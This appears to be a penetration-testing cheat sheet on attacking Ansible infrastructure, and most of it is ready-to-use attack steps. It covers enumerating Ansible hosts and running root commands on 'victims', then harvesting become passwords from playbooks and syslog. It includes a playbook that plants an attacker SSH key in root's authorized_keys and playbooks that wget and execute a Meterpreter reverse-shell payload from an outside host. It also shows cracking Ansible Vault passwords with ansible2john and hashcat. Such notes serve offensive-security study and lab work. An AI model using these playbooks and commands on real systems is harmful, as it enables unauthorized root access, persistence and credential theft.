Ansible
Enumerating Ansible
Is Ansible in use? (Server)
ansible
ls /etc/ansible
grep ansible /etc/passwd
Identify Ansible nodes (Client)
grep ansible /etc/passwd
Attack Vectors
Initiated from server
ad-hoc commands
playbooks
Running ansible commands
su ansibleadm
ansible victims -a "whoami"
running as root the name victims comes from the /etc/ansible/hosts file so adjust as needed
ansible victims -a "whoami" --become
ansible appservers -a "whoami"
Ansible Playbooks
Running playbooks
ansible-playbook [playbookname.yml]
Exploiting Playbooks
root
run playbooks as the ansible user
not root
search for hardcoded creds in playbooks
ansible_become_pass
/var/log/syslog | grep for pass
Adding tasks if writable
- name: Get system info
hosts: all
gather_facts: true
become: yes
tasks:
- name: Display info
debug:
msg: "The hostname is {{ ansible_hostname }} and the OS is {{ansible_distribution }}"
- name: Create a directory if it does not exist
file:
path: /root/.ssh
state: directory
mode: '0700'
owner: root
group: root
- name: Create authorized keys if it does not exist
file:
path: /root/.ssh/authorized_keys
state: touch
mode: '0600'
owner: root
group: root
- name: Update keys
lineinfile:
path: /root/.ssh/authorized_keys
line: "ssh-rsa AAAAB3NzaC1...Z86SOm..."
insertbefore: EOF
Reverse Meterpreter
- name: Meterpreter reverse tcp
hosts: linuxvictim
gather_facts: true
become: yes
become_user: root
tasks:
- name: Run command
shell: "mkdir /tmp/shell"
async: 10
poll: 0
- name: Run command
shell: "wget http://192.168.X.Y/final.out -P /tmp/shell/"
async: 10
poll: 0
- name: Run command
shell: "chmod +x /tmp/shell/final.out "
async: 10
poll: 0
- name: Run command
shell: "/tmp/shell/final.out &"
async: 10
or
- name: Meterpreter reverse tcp
hosts: linuxvictim
gather_facts: true
become: yes
become_user: root
tasks:
- name: Run command
shell: "mkdir /tmp/shell && wget http://192.168.X.Y/final.out -P /tmp/shell/ && chmod +x /tmp/shell/final.out && /tmp/shell/final.out &"
async: 10
poll: 0
Ansible Vault
Copy encrypted password
use ansible2john.py
returns string for hashcat to use
python3 /usr/share/john/ansible2john.py ./test.yml > ans2johnhash.txt
copy string into testhash.txt
then run hashcat
hashcat testhash.txt --force --hash-type=16900 /usr/share/wordlists/rockyou.txt
copy original vault string to text file and use ansible-vault decrypt with the discovered password
cat pw.txt | ansible-vault decrypt
Ansible Data Leakage
leak to /var/log/syslog
Cleartext in playbooks
unless nolog is set in the playbook
Last updated
Was this helpful?